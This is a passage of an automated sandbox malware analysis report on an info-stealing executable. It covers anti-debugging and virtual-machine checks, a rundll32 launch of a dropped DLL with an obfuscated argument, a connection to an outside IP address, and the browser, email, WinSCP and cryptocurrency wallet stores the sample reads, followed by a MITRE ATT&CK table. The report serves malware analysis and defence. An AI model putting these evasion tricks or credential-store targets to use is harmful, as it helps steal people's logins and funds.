                      Source: MqE1p1WFrf.exe, 00000001.00000003.349875511.0000000000477000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: GY\MACHINE\SOFTWARE\VMware, Inc.\VMware ToolsInformationTarget Id 0\Logical Unit Id 0
                      Source: MqE1p1WFrf.exe, 00000001.00000002.358805117.0000000002C80000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLink0c9f}SymbolicLink
                      Source: MqE1p1WFrf.exe, 00000001.00000003.310294204.0000000002640000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DisableGuestVmNetworkConnectivity
                      Source: rundll32.exe, 00000004.00000003.408357863.0000017ED6ED7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                      Source: MqE1p1WFrf.exe, 00000001.00000002.358805117.0000000002C80000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinke5d05f0c9f}SymbolicLink
                      Source: rundll32.exe, 00000004.00000003.408357863.0000017ED6ED7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWws\System32\en-US\wshqos.dll.mui
                      Source: MqE1p1WFrf.exe, 00000001.00000003.310294204.0000000002640000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: EnableGuestVmNetworkConnectivity
                      Source: MqE1p1WFrf.exe, 00000001.00000002.358259784.0000000002170000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLinkSymbolicLink

                      Anti Debugging

                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | Thread information set: HideFromDebugger
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007FFA06EE91A8 IsDebuggerPresent,IsProcessorFeaturePresent,4_2_00007FFA06EE91A8
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007FFA06EE6694 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,4_2_00007FFA06EE6694
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | Code function: 1_2_004081BD LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004081BD
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | Code function: 1_2_00403484 GetModuleHandleA,IsBadCodePtr,VirtualProtect,GetProcessHeap,RtlAllocateHeap,IsBadCodePtr,IsBadReadPtr,IsBadStringPtrA,lstrlenA,GetProcessHeap,HeapAlloc,1_2_00403484
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | Process queried: DebugPort
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | Process queried: DebugFlags
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | Process queried: DebugObjectHandle
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | Memory protected: page execute and read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Windows\System32\rundll32.exe | Network Connect: 179.43.163.126 80
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeProcess created: C:\Windows\System32\rundll32.exe "c:\users\user\appdata\roaming\nsis_uns60877c.dll",printuientry |5cqkohmaaaa|1tkr5gsmwyd|67sdqg8oaal|xymwxc0tnso|1k8b3tzkgiyf2sazqbyag4xap9sadmamgauakvkhwbs8|atbqpz8dw|ae8angbgowbjrwaxahyhaeljaejvadaawi0cwuid|+wo6aqcaabi|4pekmpmzmxm|4lejbhiivqkvxbiiuwkcf0bsp+lrcqwsikejpabathibwaismde2yqqlqhrdoebeejxg8abjweqgqfaso05lgbzjz8diwwk|0gdyeilwuil9uyravr7aaprsit|yoojiajrwwyfv2viiwqlyppwm||jsitqgeg70f90nkidwibii|8csdvcdcpmg|94sbh1gkylqp9qzkgdogt0b+4reut1cbeqebau|3qfsisa69vi64ti|qdbagbau1x|vldbvefvqvb7qvddawabou1a|02l+eyl8kil79kphfzz8exjsf88qye8cvbfao8ad4xq8|bbi4t7cyjz8ixasi087wephnzqeyo8cd2mlqephmfz8esl|2cgritfhit3|yrei08ytaph|0wd2ugd8tpjv0wfyq+epppwtf+lxegleeuz0v9ia9okaotadp8dqchkdq++wn76aafea9c|exxs|0gb+qr8dxx0|w6dwqfjg8ae|0e7yxnp68al|8eptwxoryss|4tma+t0wdptvqoqdffbixtbanp|m8mkakylwuu3d8hjybedyouqafdbigdveo0zwdof9ke7dlbgekyag||gayp4chlu6|8ksivlqf|vsd+jbpedxeqqxatfo28ycq9mauff|0feqv1bxf9e+11bmxdigexgaf5kaivp6gb+||+|sixad4sydsbm9y2vaysremgz|+j9m30gjv8eti1f|0yz0ovl|1qk|wiaieyl4a+ea3p1iewoedpai9orif9iixwkikygciagp0il8a+es3ugpid|ueinvghejuffqeinjcsfeuil79jofp1+ii1wsgreibdiiczz8ohn7ya|risgjvciqscmil1yyigjhcsahxle9vpwiw7aifijjctycrehmjeg6dhviiuc|i0ytitdokid+|tssiogmeyjzctvoeylpboytilcboqbhctchxggko0ru41hszcmjpdz8enfi9to6fwfmiqc7ngysi2eedjbgpn|iy1pbeqwgkqcf4ppaxxzgbx4mv8humv4du2lhlsk9cixlct4nqhc|0g72hi4g|psv3yzri1jqpoalkdbuacyakygqmoi+od0gus2mmaxsy1u+yrsksbjg+hs6n1rgjbii86mihhi|4x|dbklvujm|i4wgzfijuwkqp8p10ibxhqhysqtcc0b
                      Source: MqE1p1WFrf.exe, 00000001.00000003.329395162.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.327426446.000000000264D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: TargetundeleteSoftware\Microsoft\Tracking\TimeOut::{9db1186e-40df-11d1-aa8c-00c04fb67863}:Shell_TrayWnd
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: ShellFileViewFolderExploreFolderConfirmCabinetIDDeleteGroupDeleteItemReplaceItemReloadFindFolderOpenFindFileCreateGroupShowGroupAddItemExitProgman[RN
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: %c:\%sExplorerDMGFrameGroupssetupPmFrameGetIconGetDescriptionGetWorkingDirSoftware\Microsoft\Windows\CurrentVersion\Explorer\MapGroupsSenderCA_DDECLASSInstallMake Program Manager GroupStartUpccInsDDEBWWFrameDDEClientWndClassBACKSCAPEMediaRecorderMedia Recorder#32770DDEClientddeClassgroups
                      Source: MqE1p1WFrf.exe, 00000001.00000003.332134929.00000000020C0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: Program Manager
                      Source: MqE1p1WFrf.exe, 00000001.00000003.313283405.0000000002320000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.312271989.0000000002647000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: GetProgmanWindow
                      Source: rundll32.exe, 00000004.00000003.363854408.0000017ED8970000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: WindowOverrideScaleFactorShell_TrayWnd[
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: PreviewMetadataLabelPreviewMetadataSpacerPreviewEditMetadataPreviewMetadataControlIconLayoutsWorkAreaChangeActivityPreviewMetadataRowAddRemoveAppBarShell_TrayWndhomepagetasklinktasklinkTaskSearchTexttasks%s
                      Source: MqE1p1WFrf.exe, 00000001.00000003.332134929.00000000020C0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: *Program ManagerpszDesktopTitleWSoftware\Classes\
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: animationTileContentsSrcVerticalScrollBaranimationProgressSrcanimationTileContentsDstInneranimationTileContentsSrcInneranimationTileContentsDstanimationProgressDstInneranimationProgressDstanimationProgressSrcInnereltRegularTileHeadereltSummaryeltInterruptPaneeltProgressBaridOperationTileeltInterruptDoForAlleltItemIconeltInterruptDescriptioneltInterruptButtonsContainereltInterruptDeleteBtneltInterruptElevateBtneltItemPropseltItemNameeltInterruptYesBtneltInterruptRetryBtneltInterruptCancelBtneltInterruptSkipBtnConfirmationCheckBoxDoForAlleltInterruptNoBtneltInterruptOKBtnshell\shell32\operationstatusmgr.cppidTileSubTextidOperationInterrupteltInterruptDoForAllLabelidTileActionIdTileKeepSourceidItemTileIdTileDecideForEachIdTileIgnoreIdTileKeepAsPersonalIdTileKeepAsWorkIdTileKeepDestCustomCommandIconDecideForEachTileIconSkipTileIconKeepSourceTileIconeltItemTileContainereltConflictInterruptDescriptionidTileIconidCustomConflictInterrupteltInterruptTileHeaderidConflictInterrupteltRateChartCHARTVIEW%0.2fIdTileDefaulteltPauseButtoneltTileContentseltTile%ueltTimeRemainingeltConflictInterrupteltConfirmationInterrupteltLocationseltItemsRemainingeltDetailseltScrolleltRegularTileeltCancelButtonidTileHosteltScrollBarFillereltDividereltProgressBarContainereltDisplayModeBtnFocusHoldereltDisplayModeBtnWindows.SystemToast.ExplorerEnthusiastModeprogmaneltFooterArealfEscapementSoftware\Microsoft\NotepadRICHEDIT50WlfUnderlinelfItaliclfWeightlfOrientationlfClipPrecisionlfOutPrecisionlfCharSetlfStrikeOutLucida ConsoleiPointSizelfPitchAndFamilylfQualitylfFaceName
                      Source: MqE1p1WFrf.exe, 00000001.00000003.326445886.00000000020C9000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.326882570.0000000002270000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWndSHCore.Subclass.DataSystem\CurrentControlSet\Control\HvsiWindowOverrideScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Explorer\FCM\Impolite[
                      Source: MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: ImageList_CoCreateInstanceProgmanProgram Managercomctl32.dllImageList_ReplaceIconImageList_CreateImageList_Destroy
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: |}TFoldersAppPropertiesShell*ProgmanProgmanPROGMANSoftware\Microsoft\Windows\CurrentVersion\PoliciesPolicyAutoColorizationHandleAssociationChange
                      Source: MqE1p1WFrf.exe, 00000001.00000003.313283405.0000000002320000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.312271989.0000000002647000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SetProgmanWindow
                      Source: MqE1p1WFrf.exe, 00000001.00000003.332134929.00000000020C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: RtlDllShutdownInProgress_p0.*System*.*....../UseSystemForSystemFoldersSoftware\Microsoft\Windows\CurrentVersion\Explorerdesktop.ini%APPDATA%%USERPROFILE%%ALLUSERSPROFILE%%ProgramFiles%%SystemRoot%%SystemDrive%\\%COMPUTERNAME%...\...PATH.exe.lnk.cmd.bat.com.pifCutListSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\VarFileInfo\Translation\StringFileInfo\%04X%04X\FileDescription\StringFileInfo\040904E4\FileDescription\StringFileInfo\04090000\FileDescriptionProgram ManagerpszDesktopTitleW%%%s%%%sUSERPROFILEProgramFilesSystemRootSystemDrivewindir"%1"commandshellSoftware\classesDefaultIconshell\%sAssignmentType0Software\Classes\Applications\%sSoftware\Classes\Applications%1.ade.adp.app.asp.cer.chm.cnt.crt.csh.der.fxp.gadget.grp.hlp.hpj.inf.ins.isp.its.js.jse.ksh.mad.maf.mag.mam.maq.mar.mas.mat.mau.mav.maw.mcf.mda.mdb.mde.mdt.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mshxml.msp.mst.msu.ops.pcd.pl.plg.prf.prg.printerexport.ps1.ps1xml.ps2.ps2xml.psc1.psc2.psd1.psm1.pst.scf.sct.shb.shs.theme.tmp.url.vbe.vbp.vbs.vhd.vhdx.vsmacros.vsw.webpnp.ws.wsc.wsf.wsh.xnkHKCU:HKLM:HKCR:%s\shell\%s\commandshell\%s\commandSoftware\Clients\%sSoftware\Clients\%s\%sOpen*.*....../UseSystemForSystemFoldersdesktop.ini%SystemDrive%\\%COMPUTERNAME%...\...%s\%s\StringFileInfo\04090000\FileDescriptionT
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFA06EE1DD4 cpuid 4_2_00007FFA06EE1DD4
                      Source: C:\Windows\System32\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DAB92C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,4_2_00007DF471DAB92C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFA06EE3198 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,GetTickCount64,QueryPerformanceCounter,4_2_00007FFA06EE3198
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeCode function: 1_2_00404608 EntryPoint,GetVersion,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,1_2_00404608

                      Stealing of Sensitive Information

                      Source: Yara match; File source: 4.3.rundll32.exe.17ed8d50000.9.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 4.3.rundll32.exe.17ed8ee0000.11.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 4.3.rundll32.exe.17ed8d50000.8.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 4.3.rundll32.exe.17ed8e60000.14.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000004.00000003.353314399.0000017ED8C6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.353657620.0000017ED8E6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.406415950.0000017ED8D42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000001.00000003.307940010.000000000056E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.384266045.0000017ED94B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.383899245.0000017ED92B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000001.00000002.357859065.0000000000500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\System32\rundll32.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                      Source: C:\Windows\System32\rundll32.exe; Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security
                      Source: C:\Windows\System32\rundll32.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt
                      Source: C:\Windows\System32\rundll32.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                      Source: C:\Windows\System32\rundll32.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks
                      Source: C:\Windows\System32\rundll32.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Windows\System32\rundll32.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Windows\System32\rundll32.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\System32\rundll32.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\System32\rundll32.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\System32\rundll32.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log

                      Remote Access Functionality

                      Source: Yara match; File source: 4.3.rundll32.exe.17ed8d50000.9.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 4.3.rundll32.exe.17ed8ee0000.11.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 4.3.rundll32.exe.17ed8d50000.8.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 4.3.rundll32.exe.17ed8e60000.14.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000004.00000003.353314399.0000017ED8C6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.353657620.0000017ED8E6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.406415950.0000017ED8D42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000001.00000003.307940010.000000000056E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.384266045.0000017ED94B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000003.383899245.0000017ED92B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000001.00000002.357859065.0000000000500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\System32\rundll32.exe; Code function: 4_2_00007DF471DAB92C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe, 4_2_00007DF471DAB92C
                      Source: C:\Windows\System32\rundll32.exe; Code function: 4_2_00007DF471DD48E4 socket,bind, 4_2_00007DF471DD48E4
                      MITRE ATT&CK techniques by tactic (numbers in parentheses are the signature counts shown in the report's matrix):

                      Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
                      Execution: Windows Management Instrumentation (221), Command and Scripting Interpreter (12), Native API (2), At (Windows), Cron, Launchd
                      Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common
                      Privilege Escalation: Process Injection (13), Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common
                      Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (35), Disable or Modify Tools (1), Process Injection (13), Obfuscated Files or Information (1), Rundll32 (1)
                      Credential Access: OS Credential Dumping (1), Input Capture (21), Credentials in Registry (1), NTDS, LSA Secrets, Cached Domain Credentials
                      Discovery: System Time Discovery (1), Security Software Discovery (771), Virtualization/Sandbox Evasion (35), Process Discovery (12), File and Directory Discovery (2), System Information Discovery (257)
                      Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
                      Collection: Email Collection (1), Input Capture (21), Archive Collected Data (1), Data from Local System (1), Keylogging, GUI Input Capture
                      Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
                      Command and Control: Encrypted Channel (2), Ingress Tool Transfer (2), Non-Application Layer Protocol (1), Application Layer Protocol (1), Fallback Channels, Multiband Communication
                      Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service
                      Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features
                      Impact: Modify System Partition, Device Lockout, Delete Device Data

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.